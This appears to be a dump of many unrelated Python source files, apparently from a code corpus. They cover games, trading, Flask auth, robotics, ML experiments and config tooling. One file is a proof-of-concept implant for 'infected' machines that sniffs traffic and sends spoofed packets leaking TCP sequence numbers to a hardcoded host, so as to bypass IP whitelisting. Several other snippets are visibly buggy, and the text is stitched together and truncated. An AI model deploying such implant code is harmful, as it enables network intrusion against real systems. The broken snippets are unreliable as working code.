elif event.key == pygame.K_RIGHT:
speed = skier.turn(1)
skier.move(speed)
map_position += speed[1]
if map_position >=640: # missed the ":" here
create_map()
map_position = 0
hit = pygame.sprite.spritecollide(skier, obstacles, False)
if hit:
if hit[0].type == "tree" and not hit [0].passed:
points = points - 100
skier.image = pygame.image.load("skier_crash.png")
skier.angle = 0
speed = [0, 6]
hit[0].passed = True
elif hit[0].type == "flag" and not hit[0].passed:
points += 10
hit[0].kill()
obstacles.update()
score_text = font.render("Score: " +str(points), 1, (0, 0, 0)) # missed the closing ")"
# typo of score in above line, you input acore
animate()
pygame.quit()
| StarcoderdataPython |
101364 | #!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
POC client on 'infected' machines to receive injected packets
intended to bypass IP whitelisting
"""
import sys
import time
import socket
from threading import Thread
from Queue import Queue, Empty
from scapy.all import *
conf.sniff_promisc = 0
#References
# http://stackoverflow.com/questions/16279661/scapy-fails-to-sniff-packets-when-using-multiple-threads?rq=1
class ControlConnection:
def __init__(self, host,dport):
self.host = host
self.dport = dport
self.snifferstarted = False
def setup_cc(self):
self.q = Queue()
sniffert = Thread(target = self.__sniffer, args = (self.q,self.host))
sniffert.daemon = True
sniffert.start()
self.snifferstarted = True
def __sniffer(self, q, targetip,sniface='eth0'):
sniff(iface=sniface,store=0,prn=lambda x : q.put(x),filter="ip and host {}".format(targetip))
def connect(self):
if self.snifferstarted:
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect((self.host, self.dport))
def keepalive(self,data='exfil'):
self.s.sendall(data)
def leaknum(self):
pkt = None
try:
pkt = self.q.get(timeout=1)
except Empty:
pass
return pkt
def getdata(self):
self.s.settimeout(5)
print self.s.recv(6)
print self.s.recv(4)
def close(self):
self.s.close()
def leaknums(leakednum, leakedport):
pkt = IP(src="172.16.218.156",dst="172.16.218.152") / TCP(dport=8080,sport=leakedport,seq=leakednum)
send(pkt)
if __name__ == "__main__":
if len(sys.argv) != 3:
print "{} <whitelisted ip> <port>".format(sys.argv[0])
sys.exit()
whitelistedip = sys.argv[1]
portnum = int(sys.argv[2])
cc = ControlConnection(whitelistedip,portnum)
cc.setup_cc()
time.sleep(2)
cc.connect()
while True:
pkt = cc.leaknum()
print repr(pkt)
if pkt:
tcpdata = pkt.getlayer(TCP)
#SA flags set
if tcpdata.flags == 16:
print 'leaking'
leaknums(tcpdata.seq,tcpdata.sport)
leaknums(tcpdata.ack,tcpdata.sport+1)
try:
cc.getdata()
except:
pass
cc.close()
| StarcoderdataPython |
1744402 | # -*- coding: utf-8 -*-
r"""
:mod:`ganground` -- Lightweight framework for common ML workflow
================================================================
.. module:: ganground
:platform: Unix
:synopsis: Flexible wrapper of PyTorch which organizes boilerplate code.
"""
from ganground._version import *
from ganground import data
from ganground.data import *
from ganground import nn
from ganground import optim
from ganground import metric
from ganground.metric import *
from ganground import measure
from ganground.measure import *
from ganground.random import PRNG
from ganground import logging
from ganground import tracking
from ganground.exp import Experiment
| StarcoderdataPython |
4801067 | #!/usr/bin/env python3
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import argparse
import os
import numpy as np
import time
import sys
import signal
from conban_spanet.environment import Environment
from conban_spanet.conbanalg import *
from bite_selection_package.config import spanet_config as config
NUM_FEATURES = 2048 if config.n_features==None else config.n_features
envir = None
def signal_handler(sig, frame):
print()
print("Caught SIGINT")
if envir is not None:
print("Saving features to features.csv")
np.savetxt("features.csv", envir.features, delimiter=",")
print("Exiting...")
sys.exit(0)
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument('-ho', '--horizon', default=5000,
type=int, help="how long to run the experiment")
ap.add_argument('-n', '--N', default=1,
type=int, help="how many food items in the plate")
ap.add_argument('-a', '--algo', default="greedy",
type=str, help="how many food items in the plate")
ap.add_argument('-alp', '--alpha', default=0.05,
type=float, help="alpha for LinUCB")
ap.add_argument('-ga', '--gamma',default=1000,
type=float, help="gamma for singleUCB")
ap.add_argument('-eps', '--epsilon',default=0,
type=float, help="epsilon for epsilon-greedy")
ap.add_argument('-g', '--gpu', default='0', type=str, help="GPU ID")
args = ap.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
# Initialize ContextualBanditAlgo
if args.algo == "greedy":
algo = ContextualBanditAlgo(N=args.N)
elif args.algo == "epsilon":
# 1 Nov 2019: Change epsilon from input to args
# epsilon = float(input("Set epsilon: "))
algo = epsilonGreedy(N=args.N, epsilon=args.epsilon)
args.algo += "_e_" +str(args.epsilon)
elif args.algo == "singleUCB":
algo = singleUCB(N=args.N, alpha=args.alpha, gamma=args.gamma)
args.algo += "_alpha_"+str(args.alpha)+"_gamma_"+str(args.gamma)
elif args.algo == "multiUCB":
algo = multiUCB(N=args.N)
elif args.algo == "UCB":
delta = float(input("Set delta: "))
algo = MultiArmedUCB(N=args.N, T=args.horizon, delta=delta)
args.algo += "_delta_"+str(delta)
# Initialize Environment
envir = Environment(args.N)
signal.signal(signal.SIGINT, signal_handler)
# Run Environment using args.horizon
start = time.time()
cost_algo, cost_spanet,pi_star_choice_hist,pi_choice_hist,expected_srs,loss_list, pi_star_loss = envir.run(algo, args.horizon,
time=time, time_prev=start)
end = time.time()
print("Time taken: ", end-start)
print("pi loss is: ", np.round(cost_algo,2))
print()
print("Cumulative loss is: ", np.sum(cost_algo))
previous_dir = os.getcwd()
result_dir = os.path.join(previous_dir, "results")
# data_to_output = np.array([cost_algo, cost_spanet, pi_star_choice_hist,pi_choice_hist])
# data_to_output = data_to_output.T
output_file_name = args.algo +"_l_"+str(LAMB_DEFAULT)+"_f_"+str(NUM_FEATURES)+"_wo_banana.npz"
output_file_name = os.path.join(result_dir, output_file_name)
print("Saved output file to ", output_file_name)
np.savez(output_file_name,
#exp_loss=np.array(loss_list),
pi_loss = np.array(cost_algo),
pi_choice_hist=np.array(pi_choice_hist),
pi_star_choice_hist=np.array(pi_star_choice_hist),
pi_star_loss = np.array(pi_star_loss))
# Store returned lists to CSV for later plotting
# Now output to regret and choice history
# np.savetxt(output_file_name, data_to_output, delimiter=',')
| StarcoderdataPython |
3275581 | <gh_stars>1-10
from binance.client import Client
import Settings
import json
api_key = Settings.BINANCE_API_KEY
api_secret = Settings.BINANCE_API_SECRET
client = Client(api_key, api_secret)
# I didn't know this endpoint existed, will use this endpoint next time.
# print(client.get_products())
# get all symbol prices
prices = client.get_all_tickers()
listBtc = []
# Filtering out results that don't contain BTC
for eachPrice in prices:
if 'btc' in eachPrice['symbol'].lower():
listBtc.append(eachPrice['symbol'])
print(eachPrice['symbol'])
print(listBtc)
# This list will contain all the tickers without the tracker suffix of BTC
list_without_btc = []
for eachTicker in listBtc:
eachNewTicker = eachTicker[:-3]
list_without_btc.append(eachNewTicker)
print(list_without_btc)
# This file contains a list of almost all known currencies, pulled from github
allCurrencies = json.loads(open('cryptocurrencies.json').read())
# Data object will hold a key value pair of each tracker
# Key will be the shorthand ticker, value will hold the full name
# { BTC : 'Bitcoin'}
data = {}
for eachTicker in list_without_btc:
for eachCurrency in allCurrencies:
if eachCurrency == eachTicker:
data[eachTicker] = allCurrencies[eachCurrency]
continue
json_data = json.dumps(data)
print(json_data)
# Dump all this data into a file, so that it can be used by the twitter main.py script
with open('data.json', 'w') as outfile:
json.dump(data, outfile)
| StarcoderdataPython |
1655501 | <reponame>newtoallofthis123/PythonProjects
# Name of the Project : IJ-Speed.py
# Written by NoobScience : https://github.com/newtoallofthis123
# Modules Used : imdb (pip install speedtest)
# import the module as st
import speedtest as st
import tkinter as tk
from tkinter import *
def speedtest():
# defining
stn = st.Speedtest()
# Get upload and download
download = stn.download(dwn.get())
upload = stn.upload(upl.get())
#printing download and upload speeds
print(download)
print(upload)
# Get Servers
stn.get_servers([])
# Get Ping for the Servers
ping = stn.results.ping
# Print ping
print(ping)
if __name__=="__main__":
gui = tk.Tk()
gui.title("IJ-Speed")
gui.geometry("300x300")
gui.configure(bg="black")
dwn = StringVar()
upl = StringVar()
label = tk.Label(
gui,
text = "IJ Speed Test",
font=("Arial", 36),
bg="black",
fg="red",
).pack(fill=tk.X, pady=2)
entry = tk.Entry(
gui,
textvariable=dwn, width =100).pack(pady=5)
button = tk.Button(
gui,
text = "Give URL",
font=("Arial", 18),
bg="yellow",
fg="black",
command =speedtest,).pack(pady=2)
| StarcoderdataPython |
64230 | <filename>scripts/tag_mp3.py
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
import argparse
import json
from mutagen.id3 import ID3, TDRL, COMM
from pathlib import Path
from pprint import pprint
parser = argparse.ArgumentParser(description="tag mp3 using vgmdb -J")
parser.add_argument("dir", help='dir of mp3')
parser.add_argument("json", help='json from vgmdb -J')
parser.add_argument(
"-r",
help='release_date only',
action='store_true',
dest='release_date_only')
args = parser.parse_args()
# args = argparse.Namespace(dir="/Users/bilalh/aa", json="/Users/bilalh/aa/n.json")
# pprint(args)
data = json.load(Path(args.json).expanduser().open())
allowed = {"comment", "release_date"}
pprint(data)
for fp in Path(args.dir).expanduser().glob("*.mp3"):
print("Processing {}".format(fp))
cur = ID3(filename=str(fp), v2_version=3)
cur.update_to_v23()
for key_json in allowed:
if args.release_date_only and key_json != 'release_date':
continue
try:
value = data[key_json]
if value is not None:
print("Setting {}={}".format(key_json, value))
if key_json == "release_date":
arr = reversed(value.split('.'))
val2 = "-".join(arr)
cur.delall('TDRL')
cur.add(TDRL(encoding=3, text=[val2]))
elif key_json == "comment":
cur.delall('COMM')
cur.delall('COMM::ENG')
cur.delall('COMM::XXX')
cur.add(
COMM(encoding=3, lang='eng', desc='', text=[value]))
except KeyError as e:
pass
cur.save()
| StarcoderdataPython |
1652887 | <reponame>BhargavRE25/Rover-Machine-Learning
#!/usr/bin/env python
# Converts laser scan to planar distance
# and segments into obstalces and just hills
import rospy
from std_msgs.msg import Header
from sensor_msgs.msg import LaserScan, Imu, Image
from tf.transformations import euler_from_quaternion
from cv_bridge import CvBridge, CvBridgeError
import cv2
from copy import deepcopy
import math
import scipy.stats
import numpy as np
def to_hsv(img):
return cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
class ObjectDetector:
"""Handles the logic of detecting the cubesat, the base, and the base front.
"""
# color that ALWAYS occurs in a base connected component and
# NEVER occurs in a cubesat or rover connected component
def __init__(self):
pass
base_key = ((5, 100, 100), (15, 255, 255))
# color range of base, cubesat and rover
object_ranges = [
((10, 25, 70), (60, 255, 255))
]
# Base Front Color Range
front_ranges = [
((75, 50, 50), (150, 255, 255))
]
def segment(self, hsv_img):
base_mask = self.detect_base(hsv_img)
base_mask[base_mask > 0] = 100
base_front_mask = self.detect_base_front(hsv_img)
base_front_mask[base_front_mask > 0] = 150
cubesat_mask = self.detect_cubesat(hsv_img)
cubesat_mask[cubesat_mask > 0] = 50
rover_mask = self.detect_rover(hsv_img)
rover_mask[rover_mask > 0] = 00
return base_mask + base_front_mask + cubesat_mask + rover_mask
def detect_base(self, hsv_img):
mask = self.comp_mask(hsv_img, self.object_ranges, self.base_key, inverse_key=False)
return mask
def detect_base_front(self, hsv_img):
mask = self.comp_mask(hsv_img, self.front_ranges, max_width_height_ratio=2)
return mask
def detect_cubesat(self, hsv_img):
mask = self.comp_mask(hsv_img, self.object_ranges, self.base_key, inverse_key=True)
return mask
def detect_rover(self, hsv_img):
mask = self.comp_mask(hsv_img, self.object_ranges, self.base_key, inverse_key=True)
return mask
def comp_mask(self, hsv_img, ranges, key=None, inverse_key=False, max_width_height_ratio=None):
mask = None
for r in ranges:
new_mask = cv2.inRange(hsv_img, r[0], r[1])
if mask is None:
mask = new_mask
else:
mask = cv2.bitwise_or(mask, new_mask)
# now grow mask to encompass some background and connect things up
kernel = np.ones((3, 3))
mask = cv2.dilate(mask, kernel, iterations=4)
# now remove mask elements of outlier low pixels
connected_comps = cv2.connectedComponentsWithStats(mask, 8)
if connected_comps[0] == 1: # only background detected (i.e. no component)
return mask # return early
labels = connected_comps[1]
pixel_counts = [i[4] for i in connected_comps[2][1:]]
avg_pixel_count = np.mean([max(pixel_counts), np.mean(pixel_counts)])
min_count = min(pixel_counts)
if avg_pixel_count / min_count < 4: # no indication of "too small bits"
threshold = 0
else:
threshold = min_count + (5 if (avg_pixel_count - min_count) / 4 < 5 else (avg_pixel_count - min_count) / 4)
for idx, stats in enumerate(connected_comps[2]):
if stats[4] < threshold:
out_mask = np.array(labels, dtype=np.uint8)
out_mask[labels == idx] = 0.0
out_mask[labels != idx] = 1.0
mask = cv2.bitwise_and(mask, out_mask)
# Now strip any connected components that don't have key color if key is specified
if key is not None or max_width_height_ratio is not None:
conn_comps = cv2.connectedComponentsWithStats(mask, 8)
labels = conn_comps[1]
# print('Pre-cut # comps:', conn_comps[0] - 1)
for lab in range(1, conn_comps[0]):
do_cut = False
out_mask = np.array(labels, dtype=np.uint8)
out_mask[labels == lab] = 1
out_mask[labels != lab] = 0
if key is not None:
cropped = cv2.bitwise_and(hsv_img, hsv_img, mask=out_mask)
new_mask = cv2.inRange(cropped, key[0], key[1])
no_match = np.all(new_mask == 0)
do_cut = do_cut or ((no_match and not inverse_key) or (not no_match and inverse_key))
if max_width_height_ratio is not None:
_, _, width, height, _ = conn_comps[2][lab]
if (width / height) > max_width_height_ratio:
do_cut = True
if do_cut: # colors that should or shouldn't be there
cutout = np.array(out_mask)
cutout[out_mask == 0] = 1
cutout[out_mask > 0] = 0
mask = cv2.bitwise_and(mask, mask, mask=cutout) # cut out this component
comps = cv2.connectedComponentsWithStats(mask, 8)
# print('Final # connected components:', comps[0] - 1)
return mask
class ImageSegmenter:
""" Takes in stereo camera depth image and produces estimates of detected
obstacles
"""
def __init__(self):
rospy.init_node("image_segmenter")
# TODO: remove hard coded constant
self.NUM_BUCKETS = 4
self.bridge = CvBridge()
self.detector = ObjectDetector()
img_topic = rospy.get_param('~image_topic', '/stereo/image_proc_right/image_rect_color')
depth_img_topic = rospy.get_param('~image_topic', '/stereo/image_proc_right/image_rect_color')
pub_topic = rospy.get_param('~tagged_image_topic', '/segmented_image')
# subscriber and publishers
self.image_mask_pub = rospy.Publisher(pub_topic, Image, queue_size=4)
rospy.Subscriber(img_topic, Image, callback=self.segment_callback)
# rospy.Subscriber(depth_img_topic, Image, callback=self.depth_callback)
rospy.spin()
def segment_callback(self, data):
img = self.bridge.imgmsg_to_cv2(data, "passthrough")
hsv_img = to_hsv(img)
segmented_frame = self.detector.segment(hsv_img)
try:
self.image_mask_pub.publish(self.bridge.cv2_to_imgmsg(segmented_frame, "mono8"))
except CvBridgeError as e:
print(e)
def depth_callback(self, data):
img = self.bridge.imgmsg_to_cv2(data, "32FC1")
depths = np.array(img, dtype=np.float32)
width = len(depths[0])
buckets = [[] for i in range(self.NUM_BUCKETS)]
for row in depths:
for i, val in enumerate(row):
if not np.isnan(val):
deg = self._idx_to_degree(i, len(depths[0]))
idx = self._deg_to_bucket(deg, self.NUM_BUCKETS)
buckets[idx].append(val)
if __name__ == "__main__":
ImageSegmenter()
| StarcoderdataPython |
3207293 | import unittest
from otri.filtering.filters.generic_filter import GenericFilter
from otri.filtering.stream import Stream
def EXAMPLE_OP(x): return x + 1
class GenericFilterTest(unittest.TestCase):
def setUp(self):
self.s_A = Stream()
self.s_B = Stream()
self.gen_filter = GenericFilter(
inputs="A", outputs="B", operation=EXAMPLE_OP)
def test_simple_stream_applies(self):
# Testing the method is applied to all the elements of the input stream
expected = [EXAMPLE_OP(x) for x in range(100)]
self.s_A = Stream(list(range(100)), is_closed=True)
self.gen_filter.setup([self.s_A], [self.s_B], None)
while not self.s_B.is_closed():
self.gen_filter.execute()
self.assertEqual(self.s_B, expected)
| StarcoderdataPython |
1710349 | <filename>tests/test_cli.py
import click.testing
import pytest
from easel.__main__ import cli
from tests.test_configs import TestSites
@pytest.fixture
def runner() -> click.testing.CliRunner:
return click.testing.CliRunner()
def test__help(runner):
result_01 = runner.invoke(cli, [])
result_02 = runner.invoke(cli, ["--help"])
assert result_01.exit_code == 0
assert result_02.exit_code == 0
TEST_SITE_VALID = ["--testing", f"--site-root={TestSites.valid}"]
def test__serve(runner):
default = runner.invoke(
cli,
[*TEST_SITE_VALID, "serve"],
)
debug = runner.invoke(
cli,
[*TEST_SITE_VALID, "--debug", "serve"],
)
loglevel = runner.invoke(
cli,
[*TEST_SITE_VALID, "--loglevel=DEBUG", "serve"],
)
custom = runner.invoke(
cli,
[*TEST_SITE_VALID, "serve", "--host=0.0.0.0", "--port=5000"],
)
watch = runner.invoke(
cli,
[*TEST_SITE_VALID, "serve", "--watch"],
)
assert default.exit_code == 0
assert debug.exit_code == 0
assert loglevel.exit_code == 0
assert custom.exit_code == 0
assert watch.exit_code == 0
def test__rebuild_site_cache(runner):
result = runner.invoke(
cli,
[*TEST_SITE_VALID, "rebuild-site-cache"],
)
assert result.exit_code == 0
| StarcoderdataPython |
3317941 | <filename>examples/runners/runners/__main__.py
from surround import Assembler
from .stages import ValidateData, HelloWorld
from .batch_runner import BatchRunner
# pylint: disable=unused-import
from .web_runner import WebRunner
def main():
assembler = Assembler("Default project", ValidateData(), HelloWorld())
# Example for running batch processing
BatchRunner(assembler).run()
# Web Runner example
# WebRunner(assembler).run()
if __name__ == "__main__":
main()
| StarcoderdataPython |
189169 |
def lprint(msg,*tuple):
print(msg)
if len(tuple)>1:
for obj in tuple:
print(obj)
print("结束") | StarcoderdataPython |
1680516 | <filename>cride/events/models/leagues.py
#Django
from django.db import models
#Utils
from cride.utils.models import BetmatcherModel
class League(BetmatcherModel):
"""League model"""
name = models.CharField(max_length = 15, blank = False)
sport = models.ForeignKey(
"events.Sport",
on_delete = models.CASCADE
)
show = models.BooleanField(default = True)
top = models.BooleanField(default = False)
order = models.PositiveIntegerField(null = True)
image = models.ImageField(
"league_image",
blank = False,
)
img = models.TextField(max_length = 500, blank = True)
def __str__(self):
return self.name
| StarcoderdataPython |
3231681 | <gh_stars>10-100
import torch
import torch.nn.functional as F
class Optimization():
def __init__(self, train_loader, device):
self.train_loader = train_loader
self.device = device
def cdw_feature_distance(self, old_model, old_classifier, new_model):
"""cosine distance weight (cdw): calculate feature distance of
the features of a batch of data by cosine distance.
"""
old_model=old_model.to(self.device)
old_classifier=old_classifier.to(self.device)
for data in self.train_loader:
inputs, _ = data
inputs=inputs.to(self.device)
with torch.no_grad():
old_out = old_classifier(old_model(inputs))
new_out = new_model(inputs)
distance = 1 - torch.cosine_similarity(old_out, new_out)
return torch.mean(distance)
def kd_generate_soft_label(self, model, data, regularization):
"""knowledge distillation (kd): generate soft labels.
"""
result = model(data)
if regularization:
result = F.normalize(result, dim=1, p=2)
return result
| StarcoderdataPython |
1688681 | <reponame>simeydk/adventofcode<gh_stars>0
from typing import List, Union
from statistics import median
def read_file(filename):
with open(filename) as f:
return [line.strip() for line in f.readlines()]
PAIRS = { '(': ')', '[': ']', '{': '}', '<': '>',}
OPENS = '([{<'
CLOSES = ')]}>'
POINTS = {
')': 3,
']': 57,
'}': 1197,
'>': 25137,
}
def test_line(string: str) -> Union[str, List[str]]:
stack = []
for char in string:
if char in OPENS:
stack.append(char)
elif char in CLOSES:
expected = PAIRS[stack[-1]]
if char == expected:
stack.pop(-1)
else:
return char
else:
raise Exception('Invalid character')
return stack
def part1(data: List[str]):
errors = [test_line(line) for line in data]
points = [POINTS.get(e,0) for e in errors if type(e) == str]
return sum(points)
AUTOCOMPLETE_POINTS = {
'(': 1,
'[': 2,
'{': 3,
'<': 4,
}
def calc_autocomplete_score(missing_stack: List[str]):
missing_stack.reverse()
score = 0
for char in missing_stack:
score = score * 5 + AUTOCOMPLETE_POINTS[char]
return score
def part2(data: List[str]):
errors = [test_line(line) for line in data]
scores = [calc_autocomplete_score(e) for e in errors if type(e) == list]
return median(scores)
test_input = [
R'[({(<(())[]>[[{[]{<()<>>',
R'[(()[<>])]({[<{<<[]>>(',
R'{([(<{}[<>[]}>{[]{[(<()>',
R'(((({<>}<{<{<>}{[]{[]{}',
R'[[<[([]))<([[{}[[()]]]',
R'[{[{({}]{}}([{[{{{}}([]',
R'{<[[]]>}<{[{[{[]{()[[[]',
R'[<(<(<(<{}))><([]([]()',
R'<{([([[(<>()){}]>(<<{{',
R'<{([{{}}[<[[[<>{}]]]>[]]',
]
input_raw = read_file('2021/data/day10/input.txt')
assert (part1(test_input)) == 26397
print(part1(input_raw))
assert (part2(test_input)) == 288957
print(part2(input_raw)) | StarcoderdataPython |
45904 | #
# This is a minimal server-side web application that authenticates visitors
# using Google Sign-in.
#
# See the README.md and LICENSE.md files for the purpose of this code.
#
# ENVIRONMENT VARIABLES YOU MUST SET
#
# The following values must be provided in environment variables for Google
# Sign-in to work.
#
# These must be registered with, or provided by, the Google Cloud project:
# CLIENT_ID = 'Fill this in'
# CLIENT_SECRET = 'Fill this in'
# REDIRECT_URI = 'Fill this in'
#
# This must be set to a chosen (preferably randomly) value
# SESSION_SECRET = 'Fill this in'
from flask import Flask, redirect, render_template, request, session
import logging
import os
import requests
# Authentication helper libraries
from google.oauth2 import id_token
from google.auth.transport import requests as reqs
app = Flask(__name__)
app.secret_key = os.environ['SESSION_SECRET'].encode() # Must be bytes
@app.route('/')
def homepage():
# If user has signed in (has a valid session), welcome them. Otherwise,
# direct them to page to start that sign-in and get a valid session.
if 'email' not in session:
return redirect('/unauthenticated')
return render_template('index.html', email=session['email'])
@app.route('/unauthenticated')
def unauthenticated():
# Show a page with a link for the user to sign in with. The link is to a
# Google sign-in page, and must have the form shown
url = 'https://accounts.google.com/signin/oauth?response_type=code&'
url += 'client_id={}&'.format(os.environ['CLIENT_ID'])
url += 'scope=openid%20email&'
url += 'redirect_uri={}&'.format(os.environ['REDIRECT_URI'])
url += 'state={}&'.format('/') # After sign-in, redirect user to root URL
return render_template('unauthenticated.html', sign_in_url=url)
@app.route('/privacy')
def privacy_policy():
# Display the privacy policy.
return render_template('privacy.html')
@app.route('/callback')
def callback():
# If the user successfully signs in with Google, their browser will be
# redirected to this page. The redirect URL includes query parameters
# that can be used to get the user's identity.
args = request.args.to_dict()
redirect_path = args['state']
code = args['code']
# Ask a Google service to provide the user information associated with
# the code that provided in the redirect URL's query parameter.
resp = requests.post('https://oauth2.googleapis.com/token', data={
'code': code,
'client_id': os.environ['CLIENT_ID'],
'client_secret': os.environ['CLIENT_SECRET'],
'redirect_uri': os.environ['REDIRECT_URI'],
'grant_type': 'authorization_code'
})
# Retrieve the id_token field from the JSON response.
token = resp.json()['id_token']
# Verify the token's validity (such as proper signature from Google) and
# extract the email address from it, if possible.
try:
info = id_token.verify_oauth2_token(token, reqs.Request())
if 'email' not in info:
return render_template('error.html'), 403
session['email'] = info['email']
except Exception as e:
logging.warning('Request has bad OAuth2 id token: {}'.format(e))
return render_template('error.html'), 403
# Response will include the session token that now include the email.
return redirect('/')
# The following is used for local or other non-App Engine deployment
if __name__ == "__main__":
app.run(host='127.0.0.1', port=8080, debug=True) | StarcoderdataPython |
1732544 | <filename>examples/web/wiki/macros/wiki.py
"""Wiki macros"""
from genshi import builder
def title(macro, environ, *args, **kwargs):
"""Return the title of the current page."""
return builder.tag(environ["page.name"])
| StarcoderdataPython |
1613469 | <filename>app/routes.py
#import route libraries
from flask import render_template, request, redirect
from app import app, db
from app.models import Entry
jedi = "of the jedi"
@app.route('/')
@app.route('/index')
def index():
# entries = [
# {
# 'id' : 1,
# 'title': 'test title 1',
# 'description' : 'test desc 1',
# 'status' : True
# },
# {
# 'id': 2,
# 'title': 'test title 2',
# 'description': 'test desc 2',
# 'status': False
# }
# ]
entries = Entry.query.all()
return render_template('index.html', entries=entries)
@app.route('/add', methods=['POST'])
def add():
if request.method == 'POST':
form = request.form
title = form.get('title')
description = form.get('description')
if not title or description:
entry = Entry(title = title, description = description)
db.session.add(entry)
db.session.commit()
return redirect('/')
return "of the jedi"
@app.route('/update/<int:id>')
def updateRoute(id):
if not id or id != 0:
entry = Entry.query.get(id)
if entry:
return render_template('update.html', entry=entry)
return "of the jedi"
@app.route('/update', methods=['POST'])
def update():
if not id or id != 0:
entry = Entry.query.get(id)
if entry:
db.session.delete(entry)
db.session.commit()
return redirect('/')
return "of the jedi"
@app.route('/delete/<int:id>')
def delete(id):
if not id or id != 0:
entry = Entry.query.get(id)
if entry:
db.session.delete(entry)
db.session.commit()
return redirect('/')
return "of the jedi"
@app.route('/turn/<int:id>')
def turn(id):
if not id or id != 0:
entry = Entry.query.get(id)
if entry:
entry.status = not entry.status
db.session.commit()
return redirect('/')
return "of the jedi"
# @app.errorhandler(Exception)
# def error_page(e):
# return "of the jedi" | StarcoderdataPython |
142969 | <reponame>RIVeR-Lab/walrus<gh_stars>1-10
from walrus_system_configuration.util import *
from catkin.find_in_workspaces import find_in_workspaces
import sys
import os
from termcolor import colored
SYSINIT_CONFIG_FILE = '/etc/init/rc-sysinit.conf'
def wait_for_net():
f = open(SYSINIT_CONFIG_FILE)
found = False
for line in f:
if 'static-network-up' in line and line.strip().startswith('start'):
found = True
return found
def install():
if wait_for_net():
warn("Cannot fix boot without network, you must remove 'and static-network-up' from the start line in " + SYSINIT_CONFIG_FILE)
else:
success("Not waiting for network on boot")
def status():
if wait_for_net():
warn("Waiting for network on boot")
else:
success("Not waiting for network on boot")
| StarcoderdataPython |
50167 | <reponame>NewShadesDAO/api<gh_stars>1-10
from typing import Optional
import requests
from app.config import get_settings
class TenorClient:
def __init__(self):
settings = get_settings()
self.api_key = settings.tenor_api_key
self.search_endpoint = "https://g.tenor.com/v1/search"
self.gifs_endpoint = "https://g.tenor.com/v1/gifs"
self.content_filter = "low"
self.media_filter = "minimal"
async def search_gifs(self, search_term: str, limit: int = 10, media_filter: Optional[str] = None):
params = {
"q": search_term,
"limit": limit,
"key": self.api_key,
"content_filter": self.content_filter,
"media_filter": media_filter if media_filter else self.media_filter,
}
response = requests.get(self.search_endpoint, params=params)
if not response.ok:
raise Exception(f"problem fetching gifs. q:{search_term} {response.status_code} {response.text}")
gifs = response.json().get("results")
return gifs
async def get_gif_by_id(self, gif_id: str):
params = {
"ids": gif_id,
"key": self.api_key,
}
response = requests.get(self.gifs_endpoint, params=params)
if not response.ok:
raise Exception(f"problem getting gif with id {gif_id}: {response.status_code} {response.text}")
gifs = response.json().get("results")[0]
return gifs
| StarcoderdataPython |
85871 | <filename>etc/ipython/ipython_config.py
#!/usr/bin/env python
# encoding: utf-8
from __future__ import print_function
"""
dotfiles.venv.venv_ipyconfig
==============================
venv_ipyconfig.py (venv)
Create virtual environment configurations
with a standard filesystem hierarchy overlay
and cd aliases for Bash, ZSH, Vim, and IPython
for use with virtualenv, virtualevwrapper,
and anything that has or should have
a prefix like ``VIRTUAL_ENV`` and
directories like
``./bin``, ``./etc``, ``./var/log``, and ``./src``.
Functional comparisons:
* T-Square, Compass, Table Sled, Stencil, Template, Floorplan, Lens
Venv Implementation
-------------------
- create an :py:mod:`Env` (``env = Env()``)
- define ``__WRK`` workspace root
- define ``VIRTUAL_ENV``, ``_SRC``, ``_ETC``, ``_WRD``
- define ``WORKON_HOME``
- create and add :py:mod:`Steps` (``builder.add_step(step_func)``)
- define variables like ``env['__WRK']`` (``Venv.env.environ['PATH']``)
- define IPython shell command aliases (``Env.aliases``,
``e``, ``ps``, ``git``, ``gitw``)
- create a :py:mod:`StepBuilder` (``builder = StepBuilder()``)
- build a new env from steps: ``new_env = builder.build(env)``
- print an :py:mod:`Env`to:
- ``--print-json`` -- JSON (Env.to_dict, Env.to_json)
- ``--print-ipython`` -- IPython configuration (Env.environ, Env.aliases)
- ``--print-bash`` -- Bash configuration (Env.environ, Env.aliases)
- ``--print-bash-cdalias`` -- Bash configuration (Env.environ, Env.aliases)
- ``--print-zsh`` ZSH -- configuration (Env.environ, Env.aliases)
- ``--print-zsh-cdalias`` -- ZSH configuration (Env.environ, Env.aliases)
- ``--print-vim-cdalias`` -- Vim configuration (Env.aliases)
- generate and source CdAliases that expand and complete where possible
(``cdwrk``, ``cdwrd``, ``cdw``)
- define CdAliases in venv_ipyconfig.py (this file)
- generate venv.sh (``cdwrk``)
- generate venv.vim (``:Cdwrk``)
- generate venv_cdmagic.py (``%cdwrk``, ``cdwrk``)
.. note::
This module may only import from the Python standard library,
so that it always works as ``~/.ipython/profile_default/venv_ipyconfig.py``
"""
import collections
import copy
import difflib
import distutils.spawn
import functools
import inspect
import itertools
import json
import logging
import os
import pprint
import site
import subprocess
import sys
import unittest
from collections import OrderedDict
from os.path import join as joinpath
# try/except imports for IPython
# import IPython
# import zmq
## import sympy
if sys.version_info[0] == 2:
STR_TYPES = basestring
str_center = unicode.center
import StringIO as StringIO_
StringIO = StringIO_.StringIO
# workaround for Sphinx autodoc bug
import __builtin__
def print(*args, **kwargs):
__builtin__.print(*args, **kwargs)
else:
STR_TYPES = str
str_center = str.center
import io
StringIO = io.StringIO
LOGNAME = 'venv'
log = logging.getLogger(LOGNAME)
__THISFILE = os.path.abspath(__file__)
# __VENV_CMD = "python {~venv_ipyconfig.py}"
# __VENV_CMD = "python %s" % __THISFILE
IN_IPYTHON = 'get_ipython' in locals()
IN_IPYTHON_CONFIG = 'get_config' in globals()
#print(("IN_IPYTHON", IN_IPYTHON))
#print(("IN_IPYTHON_CONFIG", IN_IPYTHON_CONFIG))
if IN_IPYTHON_CONFIG:
IPYTHON_CONFIG = get_config()
else:
IPYTHON_CONFIG = None
def in_venv_ipyconfig():
"""
Returns:
bool: True if ``get_ipython`` is in ``globals()``
"""
return IN_IPYTHON_CONFIG
DEBUG_TRACE_MODPATH = False
def logevent(event,
obj=None,
logger=log,
level=logging.DEBUG,
func=None,
lineno=None,
modpath=None,
show_modpath=None,
wrap=False,
splitlines=True):
"""
Args:
event (str): an event key
obj (thing): thing to serialize and log
logger (logging.Logger): logger to log to
level (int): logging loglevel to log (event, obj)
